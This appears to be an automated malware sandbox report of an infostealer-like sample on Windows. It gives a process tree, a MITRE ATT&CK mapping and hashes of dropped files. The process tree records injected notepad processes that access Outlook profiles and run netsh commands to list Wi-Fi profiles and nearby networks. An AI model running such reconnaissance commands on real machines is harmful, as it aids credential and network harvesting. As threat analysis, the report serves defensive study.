    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:1
    3⤵
    PID:6872
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\plat\" -spe -an -ai#7zMap13207:70:7zEvent30148
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://tiny-fixtures-glossary-advantage.trycloudflare.com/
  2⤵
  PID:5532
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fffbb6046f8,0x7fffbb604708,0x7fffbb604718
    3⤵
    PID:1716
- C:\Windows\System32\NOTEPAD.EXE
  "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\new.bat
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3768
- C:\Windows\System32\notepad.exe
  C:\Windows\System32\notepad.exe
  2⤵
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  PID:6408
- C:\Windows\System32\notepad.exe
  C:\Windows\System32\notepad.exe
  2⤵
  - Accesses Microsoft Outlook profiles
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6876
- - C:\Windows\System32\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
    3⤵
    PID:6536
  - - C:\Windows\System32\chcp.com
      chcp 65001
      4⤵
      PID:3340
  - - C:\Windows\System32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:3760
  - - C:\Windows\System32\findstr.exe
      findstr All
      4⤵
      PID:1068
- - C:\Windows\System32\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
    3⤵
    PID:2952
  - - C:\Windows\System32\chcp.com
      chcp 65001
      4⤵
      PID:6832
  - - C:\Windows\System32\netsh.exe
      netsh wlan show networks mode=bssid
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:2780
- C:\Windows\System32\notepad.exe
  C:\Windows\System32\notepad.exe
  2⤵
  - Accesses Microsoft Outlook profiles
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:4588
- - C:\Windows\System32\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
    3⤵
    PID:4860
  - - C:\Windows\System32\chcp.com
      chcp 65001
      4⤵
      PID:2600
  - - C:\Windows\System32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:5444
  - - C:\Windows\System32\findstr.exe
      findstr All
      4⤵
      PID:1764
- - C:\Windows\System32\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
    3⤵
    PID:2980
  - - C:\Windows\System32\chcp.com
      chcp 65001
      4⤵
      PID:6512
  - - C:\Windows\System32\netsh.exe
      netsh wlan show networks mode=bssid
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:6708
- C:\Windows\System32\notepad.exe
  C:\Windows\System32\notepad.exe
  2⤵
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  PID:3088
- C:\Windows\System32\notepad.exe
  C:\Windows\System32\notepad.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5552
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Python\Python312\hey.py
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SendNotifyMessage
  PID:6244
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x100,0xf4,0x120,0xfc,0x124,0x7fffa9bfcc40,0x7fffa9bfcc4c,0x7fffa9bfcc58
    3⤵
    PID:6700
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1852,i,12566885390805603650,13654838774806523883,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=1824 /prefetch:2
    3⤵
    PID:2124
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2140,i,12566885390805603650,13654838774806523883,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2184 /prefetch:3
    3⤵
    PID:3592
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,12566885390805603650,13654838774806523883,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2452 /prefetch:8
    3⤵
    PID:4576
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,12566885390805603650,13654838774806523883,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3160 /prefetch:1
    3⤵
    PID:4900
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3308,i,12566885390805603650,13654838774806523883,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3292 /prefetch:1
    3⤵
    PID:4844
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4528,i,12566885390805603650,13654838774806523883,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3668 /prefetch:1
    3⤵
    PID:2520
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4824,i,12566885390805603650,13654838774806523883,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4856 /prefetch:8
    3⤵
    PID:6168
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4884,i,12566885390805603650,13654838774806523883,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4864 /prefetch:8
    3⤵
    PID:5760
- - C:\Program Files\Google\Chrome\Application\123.0.6312.106\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.106\Installer\setup.exe" --reenable-autoupdates --system-level
    3⤵
    - Drops file in Program Files directory
    PID:4892
  - - C:\Program Files\Google\Chrome\Application\123.0.6312.106\Installer\setup.exe
      "C:\Program Files\Google\Chrome\Application\123.0.6312.106\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x7ff6c1ec4698,0x7ff6c1ec46a4,0x7ff6c1ec46b0
      4⤵
      Drops file in Program Files directory
      PID:5916
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5392,i,12566885390805603650,13654838774806523883,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5280 /prefetch:1
    3⤵
    PID:1328
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3176,i,12566885390805603650,13654838774806523883,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3480 /prefetch:1
    3⤵
    PID:1060
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5608,i,12566885390805603650,13654838774806523883,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5616 /prefetch:8
    3⤵
    - Drops file in System32 directory
    PID:1596
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Python\Python312\loader.py
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1788
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Python\Python312\x.py
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1448

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:560

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4920

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5740
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\RE-00019.pdf.download
  2⤵
  PID:6044

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:6124
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\RE-00019.pdf.download"
  2⤵
  PID:648
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\Downloads\RE-00019.pdf.download
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1628
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1944 -prefMapHandle 1940 -prefsLen 25755 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b43dfe1d-5dde-49d3-a738-9cb66d556e2a} 1628 "\\.\pipe\gecko-crash-server-pipe.1628" gpu
      4⤵
      PID:4116
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2452 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2440 -prefsLen 26675 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed3cb804-d25f-4d4f-8a63-4b9af6ab2bcf} 1628 "\\.\pipe\gecko-crash-server-pipe.1628" socket
      4⤵
      PID:5352
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3028 -childID 1 -isForBrowser -prefsHandle 3040 -prefMapHandle 3012 -prefsLen 26816 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3129e6bc-045d-4f7f-b4db-d68135093ce1} 1628 "\\.\pipe\gecko-crash-server-pipe.1628" tab
      4⤵
      PID:5524
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3856 -childID 2 -isForBrowser -prefsHandle 3848 -prefMapHandle 3844 -prefsLen 31165 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {df6739fc-00ec-4757-8948-c7f947cd5fa8} 1628 "\\.\pipe\gecko-crash-server-pipe.1628" tab
      4⤵
      PID:5836
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5096 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5104 -prefMapHandle 5108 -prefsLen 29197 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e11a895-bd11-4625-a53e-f1ff37f51401} 1628 "\\.\pipe\gecko-crash-server-pipe.1628" utility
      4⤵
      Checks processor information in registry
      PID:4388
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5264 -childID 3 -isForBrowser -prefsHandle 5256 -prefMapHandle 5252 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f49ba11-601c-4770-82ea-f574179f6115} 1628 "\\.\pipe\gecko-crash-server-pipe.1628" tab
      4⤵
      PID:2508
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5436 -childID 4 -isForBrowser -prefsHandle 5444 -prefMapHandle 5448 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55ddc3ac-d114-4b0f-aa38-7d79c76924b2} 1628 "\\.\pipe\gecko-crash-server-pipe.1628" tab
      4⤵
      PID:5748
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5732 -childID 5 -isForBrowser -prefsHandle 5652 -prefMapHandle 5660 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b852b45b-95e4-4dc5-acc3-79689ee21e8c} 1628 "\\.\pipe\gecko-crash-server-pipe.1628" tab
      4⤵
      PID:5784

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
1⤵
PID:6252

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:7052
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Python\Python312\blo.py
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4208

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3184
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Python\Python312\eu.py
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3780

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:2280
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Python\Python312\blo.py
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:5736

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:2956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\9e4c1dc086d06f2b5a4d2dada4b0c4bb\Admin@YPIMFIYL_en-US\Browsers\Mozilla\Firefox\Bookmarks.txt

Filesize
105B

MD5
2e9d094dda5cdc3ce6519f75943a4ff4

SHA1
5d989b4ac8b699781681fe75ed9ef98191a5096c

SHA256
c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

SHA512
d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

Download Submit
C:\Users\Admin\AppData\Local\9e4c1dc086d06f2b5a4d2dada4b0c4bb\Admin@YPIMFIYL_en-US\Directories\OneDrive.txt

Filesize
25B

MD5
966247eb3ee749e21597d73c4176bd52

SHA1
1e9e63c2872cef8f015d4b888eb9f81b00a35c79

SHA256
8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e

SHA512
bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa

Download Submit
C:\Users\Admin\AppData\Local\9e4c1dc086d06f2b5a4d2dada4b0c4bb\Admin@YPIMFIYL_en-US\Directories\Startup.txt

Filesize
37B

MD5
b0b87a4b635bba2a9d9413806016dbae

SHA1
5d381a1cce4f6511335da56a6257aa2aae6b8f2c

SHA256
09cddae6d0213350d68ee3561f4ba5762d06c6e650be1d6e8bbb4b2f1f1c06fc

SHA512
c8b756f23fd2f070b98deb2a9d303f2fe3a567cb8ef1ba1fd6829709054b6e1779e41646e49c05b7a3fca5ac65e2ccf57375492cf5f32920a69fc5e48bc17a88

Download Submit
C:\Users\Admin\AppData\Local\9e4c1dc086d06f2b5a4d2dada4b0c4bb\Admin@YPIMFIYL_en-US\System\Process.txt

Filesize
3KB

MD5
bc859375ace324e0397cedd71680eebe

SHA1
369a30c2180d7200c2804f192bacb24a073923d4

SHA256
70a403691c97f0fb02fc5e2ad35a48409c4eb4627c3305067170de5f59ca8f1b

SHA512
b6266cebaa194115ff647b07ce169674fc322c7ff422d055bee2c23260775ce22bf1da003a03846dc9b7a61368496ecf0863ea5bc53bb638721672cd347e73a7

Download Submit
C:\Users\Admin\AppData\Local\9e4c1dc086d06f2b5a4d2dada4b0c4bb\Admin@YPIMFIYL_en-US\System\Process.txt

Filesize
796B

MD5
2eeedc197cbb379a87cd62dd135e2ef3

SHA1
e60e5a2d6b3b8f60604e319f649f4977352dd9cc

SHA256
e37a1d42e49e63c693f8bdc6252e4463c51659e4acde7ad9c0d7b8c20dc3f197

SHA512
e485de7720faf841807f57d0440e9dd4198e5dc198627288817223b54cfd09c8db111e1a220128f09852603b859c4cc9f35340832e8bc43bcd71a55bb4ac7509

Download Submit
C:\Users\Admin\AppData\Local\9e4c1dc086d06f2b5a4d2dada4b0c4bb\Admin@YPIMFIYL_en-US\System\Process.txt

Filesize
3KB

MD5
573fe116494c8e41b80a4de8fc3de907

SHA1
16fff69f468d35ffd30c30159cd86a07ff943830

SHA256
4f5224784032715af538c9ea342771c826fe61eaea1b75f3fd74692d1f435a8f

SHA512
a57ceaf1edfff133a960324ba7e5e654be112ed04d80d56fc91c8fd1792173635e519eacb0abbc27158971f2f6a2a3d424d2164494274c953af1cb473e14a662

Download Submit
C:\Users\Admin\AppData\Local\9e4c1dc086d06f2b5a4d2dada4b0c4bb\Admin@YPIMFIYL_en-US\System\Process.txt

Filesize
4KB

MD5
9b3ee06e762444c6acc1507d6d2168c2

SHA1
2121b46c56782a7dd85f428eae55716c59951524

SHA256
5ac6f5fceccbd9e8a87c93270a909a3c00d0c679b1cd74654dcd97216d86d678

SHA512
d0bc20c61838d8d6074cd30423d9156cab21a4d40823a1f0479703e66c105cd8652d821849780b6f2bd5bd40d6ec1db3b4dd1297b7baadf13751230a9fc7565d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
29fd2e5b34c826687085c23b6d21e695

SHA1
38d7e362eabe16b9b3ab088ff011076cfed3dc94

SHA256
9188c917ebb937d38ed185596ff28f09fa1e6aa647e7845b7cb1b54f5eb2e79a

SHA512
18185e529397771618b86fba889f5001f3b727c039480e70f92dcdcaf974ccb4fef8769d053fc4ee8c10be24a28f957697ec80a1b391a1e783a08fd8ea274e38

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
211KB

MD5
151fb811968eaf8efb840908b89dc9d4

SHA1
7ec811009fd9b0e6d92d12d78b002275f2f1bee1

SHA256
043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed

SHA512
83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
456B

MD5
e91f544ab160cfa6468c1a3cc4053466

SHA1
348eb6440b995f53587163eb1d0d8bf205f61013

SHA256
4274445397fb2b42505e871d790f3ab33bb7f4ab08456b6bef4a9ee69cc54117

SHA512
5626d181637c17b20cf0ed5ad6e7f28da715f581b57f40d4ce30f9e844c7ff1efb72803468667634d3418c4b946781e613c97ee34dbe55ef3cd864aa9a47137b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
be2e39a932bc62f40e15443eb7b1a19b

SHA1
585154f9568ea044c7d9b43c4bd8841dad84e2cb

SHA256
d1fd222fea223139b88e0bfc30deb0bbc29e2a9d8ecee6e09050f149b6421c02

SHA512
bb2176784acf4d91107efab595e4bb8453052787af79aaf3a86dd8c2473f0b3196ce7d281e0c31f04d6f3692d43a4f68a94eb1ce006be5ce066ac438c60a5eca

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
098e3a77db4760c388c279668d212487

SHA1
7e8613dca7634e03349865b2deb8ff6704ae7d9e

SHA256
8d91ab50f325a80c69513ceeb4773ba11d92b824af4068f2404a4edeec9ced56

SHA512
6e91da8abf87eff871c1ef3e5aa20727389e56d7961dfed36178dc5a2948438f9e8ee512ea64769ff7a985766b52ac27627bd7afba31d7d5c910e86b7469bbdf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
5fbbf82762ac968064b838b7cd09a9be

SHA1
fe741c3006bd9b905aa362a76c94cad65a083d69

SHA256
6b67f691afdf237589b37fbe843012f3148edbdfdd3e04170e811c72a7731b51

SHA512
a963fb458090b1893d7048689a1a424473e7780f0fcf3fe586a1983d732455702ed92991763f109277672f84f047ce453f94bd73da9a2c128c256c075618aa28

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
b2b36c56d1c23809f08c0ae3b5ac506f

SHA1
fb797e7b4590dc2bb40edcfb8dc74d52cf264dca

SHA256
41c68141c3d1e5364ceb33210e1f5f753e4ff31a5ccf5db1eae3b00bfb1eb114

SHA512
af228e34c9bb7ce24a6b7057fce89e3c8e80d5c76a6ca02bc445e0272e3e277cf60bc063fd4c71aaa407cc8f5f8d6ac8a01cee857220c62239e60aa62456391a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
523B

MD5
2c352583bb4ab0450a9fa97ba93e6176

SHA1
e335341fd336901c41d3b6b8fdabb4e7fc8366d0

SHA256
e8111a1efee10966291768c1a6a4c44987b6797e22f3c525328affa92f7cb4bd

SHA512
f73e3bc4831d0b914d0b7c26fd4dfd4c6527ee084f461ad24b32dbd38298062af79221af62bd3e14fcdb95b9832de560d852dd1a1f172ba8b2808eff1520294f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
55054b8d948eb5f19c6b375de6b1e02a

SHA1
4992e6a57213295ce0ab72a96facd1bc621996a0

SHA256
ffcd8bbc34c0948791a1b964733168f67a0356370fe794565ac2195394fec1e3

SHA512
1fcae839a34e7e7ca9e06c3748593c144792f3d17908d480892bafd578e26c563e1a33e36a30094aa6dfd8b24cbeb8086a43490b6b69ce420439a9ee04426319

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
730164b323e4577879879e7e327bcfbb

SHA1
16f82b50584b83919b929afc6fbb986b40ff542f

SHA256
0940387d591b038fbf6a82b4f51be4b894bdf86dff21382a84565f93ddabfdb2

SHA512
ef42c3cd8a9d532f6729e21e932a18324fe07b753247aec796602e322adb58f2aa7c37a9f497e413e33d21807615fb061a5f9f4c166e02d8b4bd2c692fe6db46

Download Submit
